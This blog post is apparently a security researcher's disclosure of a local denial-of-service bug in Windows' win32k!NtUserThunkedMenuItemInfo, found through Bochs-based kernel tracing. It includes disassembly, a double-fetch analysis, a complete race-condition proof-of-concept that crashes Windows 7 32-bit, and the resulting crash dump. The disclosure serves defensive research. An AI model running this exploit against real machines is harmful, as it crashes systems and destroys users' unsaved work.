Windows Kernel Local Denial-of-Service #1: win32k!NtUserThunkedMenuItemInfo (Windows 7-10)

Back in 2013, Gynvael and I published the results of our research into discovering so-called double fetch vulnerabilities in operating system kernels, by running them in full software emulation mode inside of an IA-32 emulator called Bochs. The purpose of the emulation (and our custom embedded instrumentation) was to capture detailed information about accesses to user-mode memory originating from the kernel, so that we could later run analysis tools to discover multiple references to single memory addresses within the scope of one system call, and produce meaningful reports. The project was called Bochspwn [1][2][3] (or kfetch-toolkit on Github) and was largely successful, leading to the discovery of several dozen serious vulnerabilities in the Windows kernel. We believe it also played a significant role in popularizing the double-fetch vulnerability class and the concept of using system-wide instrumentation for security, as several other fruitful projects ensued as a result, probably most notable of which is Xenpwn.

After all this time, I decided to get back on the subject of full system instrumentation and analyzing various execution traces in search of indicators of potential vulnerabilities. Specifically, one of my goals was to develop more patterns (based on memory accesses or other events) which could signal problems in kernel-mode code other than just double fetches. One intuitive example of such a pattern is the absence of any exception handling at the time a ring-3 memory area is accessed. As the documentation of the Windows ProbeForRead function states:

Drivers must call ProbeForRead inside a try/except block. If the routine raises an exception, the driver should complete the IRP with the appropriate error. Note that subsequent accesses by the driver to the user-mode buffer must also be encapsulated within a try/except block: a malicious application could have another thread deleting, substituting, or changing the protection of user address ranges at any time (even after or during a call to ProbeForRead or ProbeForWrite).

There’s also an example on the Handling Exceptions MSDN page:

try {
    ...
    ProbeForWrite(Buffer, BufferSize, BufferAlignment);
 
    /* Note that any access (not just the probe, which must come first,
     * by the way) to Buffer must also be within a try-except.
     */
    ...
} except (EXCEPTION_EXECUTE_HANDLER) {
    /* Error handling code */
    ...
}

What happens if a ProbeFor* call or user memory access takes place outside of a try/except block? Typically nothing, but an authenticated, local attacker could exploit such a bug to cause an unhandled kernel exception (by passing in an invalid pointer or invalidating it during syscall runtime), and consequently crash the entire operating system with a Blue Screen of Death.

From a technical standpoint, it is not difficult to detect user-mode accesses with no exception handlers set up on 32-bit platforms. In Windows x86, the handler records are chained together in a SEH chain (starting at the well known fs:[0] address), where each handler is described by the following structure:

struct _EH3_EXCEPTION_REGISTRATION
{
 struct _EH3_EXCEPTION_REGISTRATION *Next;
 PVOID ExceptionHandler;
 PSCOPETABLE_ENTRY ScopeTable;
 DWORD TryLevel;
};

The structures reside in the stack frames of their corresponding functions, and are initialized with the __SEH_prolog4(_GS) routine at the beginning of those functions, like so:

PAGE:00671AA3                 push    58h
PAGE:00671AA5                 push    offset stru_456EB0
PAGE:00671AAA                 call    __SEH_prolog4

Later on, the beginning of each try{} block is marked by writing its 0-based index into the TryLevel field, which is subsequently overwritten with -2 (0xFFFFFFFE) when the block is closed and exception handling is disabled. Below is an example of a try/except block encapsulating the write of a single DWORD value into user-mode memory:

PAGE:00671CF3                 mov     [ebp+ms_exc.registration.TryLevel], 1
PAGE:00671CFA                 mov     eax, [ebp+var_2C]
PAGE:00671CFD                 mov     ecx, [ebp+arg_14]
PAGE:00671D00                 mov     [ecx], eax
PAGE:00671D02                 mov     [ebp+ms_exc.registration.TryLevel], 0FFFFFFFEh

Consequently, the overall callstack at the time of any user-mode memory access may look similar to the following:

Therefore, the Bochs instrumentation can iterate through the SEH chain, determine which handlers are enabled and which functions they correspond to. If there are no exception records present, or all of them have their TryLevel fields set to 0xFFFFFFFE, then an exception occurring right at that moment could potentially bring the operating system down. It should be noted, however, that not all non-guarded accesses to user-mode memory are dangerous by definition: regions previously secured by the MmSecureVirtualMemory API and special areas such as TEB or PEB are not affected.
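
The chain walk described above can be sketched in portable C++ as follows. This is a simplified model and not the actual Bochs instrumentation: the records live in ordinary host memory instead of being read from the guest, only the two relevant fields are mirrored, the chain is terminated with nullptr (the real x86 chain ends with 0xFFFFFFFF), and the names SehRecord, kTryLevelNone and IsAccessGuarded are hypothetical. It also ignores the exceptions mentioned above, such as secured regions and the TEB/PEB.

```cpp
#include <cassert>
#include <cstdint>

// Simplified stand-in for _EH3_EXCEPTION_REGISTRATION (hypothetical model).
struct SehRecord {
  const SehRecord* next;    // Next (outer) record; nullptr ends the chain here.
  std::uint32_t try_level;  // 0xFFFFFFFE means no try block is currently open.
};

constexpr std::uint32_t kTryLevelNone = 0xFFFFFFFEu;

// Returns true if at least one record in the chain has an open try block.
// max_depth bounds the walk in case the chain is corrupted or cyclic.
bool IsAccessGuarded(const SehRecord* head, int max_depth = 64) {
  assert(max_depth > 0);
  for (const SehRecord* rec = head; rec != nullptr && max_depth > 0;
       rec = rec->next, --max_depth) {
    if (rec->try_level != kTryLevelNone) {
      return true;
    }
  }
  return false;
}
```

In this model, a user-mode access observed while IsAccessGuarded returns false would be flagged as a candidate for an unhandled kernel exception.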

I ran the detection logic explained above against the latest builds of Windows 7 32-bit and Windows 10 32-bit, and found a bunch of bugs. Due to their low severity (i.e. local authenticated DoS), they do not meet the bar for security servicing by Microsoft. However, I still believe that many of them are interesting cases, and so I am planning to periodically release PoCs, crash dumps and short explanations of these issues in the upcoming weeks on this blog. I hope you will find them interesting or entertaining. Today, I will be discussing a bug in the win32k!NtUserThunkedMenuItemInfo system call. Enjoy!

The bug

The bug in question is present in the top-level handler of the aforementioned win32k!NtUserThunkedMenuItemInfo system call, which corresponds to the high-level GetMenuItemInfo and SetMenuItemInfo API functions. The two instructions accessing a user-mode pointer outside of a try/except block are as follows (based on win32k.sys from Windows 7 32-bit):

.text:BF8AAA5A                 mov     [ebp+ms_exc.registration.TryLevel], 0FFFFFFFEh
.text:BF8AAA61                 test    byte ptr [ebx+4], 1
.text:BF8AAA65                 jz      short loc_BF8AAA77
.text:BF8AAA67                 test    dword ptr [ebx+0Ch], 0FFFFEF74h
.text:BF8AAA6E                 jz      short loc_BF8AAA77

When the code executes, the EBX register is set to the value of the 5th syscall parameter, which is a user-mode pointer to the MENUITEMINFO structure. In fact, the structure is validated and copied to the kernel stack a few instructions earlier:

.text:BF8AA9F8                 and     [ebp+ms_exc.registration.TryLevel], 0
.text:BF8AA9FC                 mov     ebx, [ebp+arg_10]
.text:BF8AA9FF                 mov     eax, _W32UserProbeAddress
.text:BF8AAA04                 cmp     ebx, eax
.text:BF8AAA06                 mov     esi, eax
.text:BF8AAA08                 jnb     short loc_BF8AAA0C
.text:BF8AAA0A                 mov     esi, ebx
.text:BF8AAA0C
.text:BF8AAA0C loc_BF8AAA0C:
.text:BF8AAA0C                 push    0Ch
.text:BF8AAA0E                 pop     ecx
.text:BF8AAA0F                 lea     edi, [ebp+var_5C]
.text:BF8AAA12                 rep movsd
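
The pointer validation in the listing above boils down to clamping the user-supplied address to the probe address before the copy. Here is a minimal C++ sketch of that step. The value 0x7FFF0000 for W32UserProbeAddress is an assumption (a typical value on 32-bit Windows, not something taken from the listing), and the names kAssumedProbeAddress and ClampToProbeAddress are hypothetical.

```cpp
#include <cstdint>

// Assumed value of W32UserProbeAddress on a 32-bit system (not from the listing).
constexpr std::uint32_t kAssumedProbeAddress = 0x7FFF0000u;

// The "push 0Ch / pop ecx / rep movsd" sequence copies 0xC DWORDs.
constexpr std::uint32_t kCopiedBytes = 0xC * sizeof(std::uint32_t);
static_assert(kCopiedBytes == 48, "12 DWORDs are copied to the kernel stack");

// Mirrors the cmp/jnb pair: addresses at or above the probe address are
// replaced with the probe address itself, so the copy that follows faults
// inside the try block instead of reading kernel memory.
constexpr std::uint32_t ClampToProbeAddress(
    std::uint32_t user_ptr, std::uint32_t probe = kAssumedProbeAddress) {
  return user_ptr < probe ? user_ptr : probe;
}
```

Note that the clamp only covers the copy: the original, unclamped pointer stays in EBX and is what the later unguarded instructions dereference.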

As we can see at address 0xBF8AA9F8, exception handling is correctly enabled for the initial access of the structure, but it is then explicitly disabled at 0xBF8AAA5A, right before accessing the memory again. What does this unsafe construct even do? If we consider the MENUITEMINFO definition, the assembly can be translated into the following C code snippet:

if ((lpmii->fMask & MIIM_STATE) && (lpmii->fState & ~MFS_MASK)) {
  // Bail out.
}

The set of state flags which can be legally used by a client application are well defined in MSDN: they’re MFS_CHECKED, MFS_DEFAULT, MFS_DISABLED and MFS_HILITE (jointly MFS_MASK). Other bits in the 32-bit state field are used internally by win32k.sys, and thus should not be manipulated by user-mode programs. The if statement shown above is responsible for ensuring that no prohibited flags are being set from outside the kernel.
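
As a quick sanity check of the translation, the four public flags can be combined and compared against the immediate operand in the disassembly. The sketch below restates the constants with their winuser.h values so that it builds without the Windows SDK. The k-prefixed names and HasProhibitedState are hypothetical.

```cpp
#include <cstdint>

// Values as found in winuser.h, restated here for a standalone build.
constexpr std::uint32_t kMiimState   = 0x00000001u;  // MIIM_STATE
constexpr std::uint32_t kMfsDisabled = 0x00000003u;  // MFS_DISABLED
constexpr std::uint32_t kMfsChecked  = 0x00000008u;  // MFS_CHECKED
constexpr std::uint32_t kMfsHilite   = 0x00000080u;  // MFS_HILITE
constexpr std::uint32_t kMfsDefault  = 0x00001000u;  // MFS_DEFAULT

constexpr std::uint32_t kMfsMask =
    kMfsDisabled | kMfsChecked | kMfsHilite | kMfsDefault;

// The inverted mask matches the constant in "test dword ptr [ebx+0Ch], 0FFFFEF74h".
static_assert(kMfsMask == 0x0000108Bu, "union of the four public flags");
static_assert(static_cast<std::uint32_t>(~kMfsMask) == 0xFFFFEF74u,
              "matches the immediate in the disassembly");

// Same condition as the if statement above, expressed on plain integers.
constexpr bool HasProhibitedState(std::uint32_t fMask, std::uint32_t fState) {
  return (fMask & kMiimState) != 0 && (fState & ~kMfsMask) != 0;
}
```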

As you may have noticed, the fact that the fMask and fState fields of the input structure are referenced twice (in the inlined memcpy and during the direct bit tests) means that there is in fact a double-fetch condition here. As a result, the sanity check in the code can be bypassed by modifying the value of either of the two fields in between the two accesses in a concurrent thread. Even though this is possible, in my assessment the problem doesn’t really have a security impact, as none of the internal flags seem overwhelmingly interesting, and some extra internal validation checks were added in win32k.sys as a result of fixing a bug discovered by Tavis Ormandy in 2010.
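
To make the double fetch concrete, here is a deterministic, single-threaded C++ model of it. It is only a sketch: the concurrent thread is replaced by a callback invoked between the two fetches, the structure mirrors just the first four MENUITEMINFO fields, and the names MenuItemInfoModel and CheckBypassed are hypothetical.

```cpp
#include <cassert>
#include <cstdint>
#include <functional>

// First four fields of MENUITEMINFO (offsets 0x0, 0x4, 0x8 and 0xC on x86).
struct MenuItemInfoModel {
  std::uint32_t cbSize;
  std::uint32_t fMask;
  std::uint32_t fType;
  std::uint32_t fState;
};

constexpr std::uint32_t kMiimState = 0x00000001u;  // MIIM_STATE
constexpr std::uint32_t kMfsMask   = 0x0000108Bu;  // MFS_MASK

// Returns true if prohibited state bits end up in the captured copy even
// though the sanity check passed, i.e. the check was bypassed.
bool CheckBypassed(MenuItemInfoModel* user,
                   const std::function<void()>& between_fetches) {
  assert(user != nullptr);
  MenuItemInfoModel captured = *user;  // First fetch: the inlined memcpy.
  between_fetches();                   // Stand-in for the racing thread.
  // Second fetch: the check reads the live user structure, not the copy.
  const bool rejected =
      (user->fMask & kMiimState) != 0 && (user->fState & ~kMfsMask) != 0;
  if (rejected) {
    return false;
  }
  return (captured.fMask & kMiimState) != 0 &&
         (captured.fState & ~kMfsMask) != 0;
}
```

Calling CheckBypassed with a structure whose fState holds an internal bit, and a callback that replaces it with a public flag such as MFS_CHECKED, returns true in this model. Running the check against the captured copy instead of the live structure would close the window.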

In order to trigger the BSoD that is the subject of this post, it is required to race the permissions of the user-mode memory page that is being accessed, such that the first guarded access (the memcpy) executes with no interruption, but the second (unhandled) one generates an exception. Since changing memory access rights is generally a costly operation (in the context of beating a tight race condition window), the bug is easiest to reliably trigger on machines with ≥2 cores, as then one thread can continuously invoke the affected syscall, while the other alternates between PAGE_NOACCESS and PAGE_READWRITE rights using the VirtualProtect API. Running the two threads each on a separate core greatly improves the odds of quickly hitting a system crash.

With all this in mind, simple exploit code could look as follows:

#include <Windows.h>

namespace globals {
  LPVOID lpVolatileMem;
}  // namespace globals

// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
  __asm{mov eax, ApiNumber};
  __asm{lea edx, ApiNumber + 4};
  __asm{int 0x2e};
}

DWORD WINAPI ThreadRoutine(LPVOID lpParameter) {
  DWORD flOldProtect;

  // Indefinitely alternate between R/W and NOACCESS rights.
  while (1) {
    VirtualProtect(globals::lpVolatileMem, 0x1000, PAGE_NOACCESS, &flOldProtect);
    VirtualProtect(globals::lpVolatileMem, 0x1000, PAGE_READWRITE, &flOldProtect);
  }
}

int main() {
  // Windows 7 32-bit.
  CONST ULONG __NR_NtUserThunkedMenuItemInfo = 0x1256;

  // Initialize the thread as GUI.
  LoadLibrary(L"user32.dll");

  // Allocate memory for the buffer whose access rights are being flipped.
  globals::lpVolatileMem = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

  // Create the racing thread.
  CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ThreadRoutine, NULL, 0, NULL);

  // Infinite loop trying to trigger the unhandled exception.
  while (1) {
    SystemCall32(__NR_NtUserThunkedMenuItemInfo, 0, 0, 0, 0, globals::lpVolatileMem, 0);
  }

  return 0;
}

Starting the above program on Windows 7 32-bit instantly triggers the following blue screen:

The crash summary is as follows:

KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e)
This is a very common bugcheck.  Usually the exception address pinpoints
the driver/function that caused the problem.  Always note this address
as well as the link date of the driver/image that contains this address.
Some common problems are exception code 0x80000003.  This means a hard
coded breakpoint or assertion was hit, but this system was booted
/NODEBUG.  This is not supposed to happen as developers should never have
hardcoded breakpoints in retail code, but ...
If this happens, make sure a debugger gets connected, and the
system is booted /DEBUG.  This will let us see why this breakpoint is
happening.
Arguments:
Arg1: c0000005, The exception code that was not handled
Arg2: 80e3aa61, The address that the exception occurred at
Arg3: 96607b34, Trap Frame
Arg4: 00000000

Debugging Details:
------------------

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

FAULTING_IP: 
win32k!NtUserThunkedMenuItemInfo+7a
80e3aa61 f6430401        test    byte ptr [ebx+4],1

TRAP_FRAME:  96607b34 -- (.trap 0xffffffff96607b34)
ErrCode = 00000000
eax=96607bf4 ebx=00100000 ecx=00000000 edx=96607bf4 esi=00100030 edi=96607be8
eip=80e3aa61 esp=96607ba8 ebp=96607c14 iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246
win32k!NtUserThunkedMenuItemInfo+0x7a:
80e3aa61 f6430401        test    byte ptr [ebx+4],1         ds:0023:00100004=00
Resetting default scope

DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT

BUGCHECK_STR:  0x8E

PROCESS_NAME:  NtUserThunkedM

CURRENT_IRQL:  2

ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre

LAST_CONTROL_TRANSFER:  from 8171adff to 816b69d8

STACK_TEXT:  
966070ec 8171adff 00000003 67540871 00000065 nt!RtlpBreakWithStatusInstruction
9660713c 8171b8fd 00000003 96607540 00000000 nt!KiBugCheckDebugBreak+0x1c
96607500 8171ac9c 0000008e c0000005 80e3aa61 nt!KeBugCheck2+0x68b
96607524 816f02f7 0000008e c0000005 80e3aa61 nt!KeBugCheckEx+0x1e
96607ac4 81679996 96607ae0 00000000 96607b34 nt!KiDispatchException+0x1ac
96607b2c 8167994a 96607c14 80e3aa61 badb0d00 nt!CommonDispatchException+0x4a
96607b54 8160792d 00000000 00000000 00000000 nt!KiExceptionExit+0x192
96607c14 81678db6 00000000 00000000 00000000 hal!KeReleaseQueuedSpinLock+0x2d
96607c14 12560001 00000000 00000000 00000000 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0027f864 0027f964 00a61c7c 00001256 00000000 0x12560001
0027f868 00a61c7c 00001256 00000000 00000000 0x27f964
0027f964 00a6206a 00000001 004269c8 00426a20 NtUserThunkedMenuItemInfo!main+0x9c
0027f9b0 00a6224d 0027f9c4 75a2ef1c 7ffd9000 NtUserThunkedMenuItemInfo!__tmainCRTStartup+0x11a
0027f9b8 75a2ef1c 7ffd9000 0027fa04 7760367a NtUserThunkedMenuItemInfo!mainCRTStartup+0xd
0027f9c4 7760367a 7ffd9000 7742320c 00000000 kernel32!BaseThreadInitThunk+0xe
0027fa04 7760364d 00a5fcc1 7ffd9000 00000000 ntdll!__RtlUserThreadStart+0x70
0027fa1c 00000000 00a5fcc1 7ffd9000 00000000 ntdll!_RtlUserThreadStart+0x1b

And that’s it! I hope you enjoyed the post, and see you in the next one!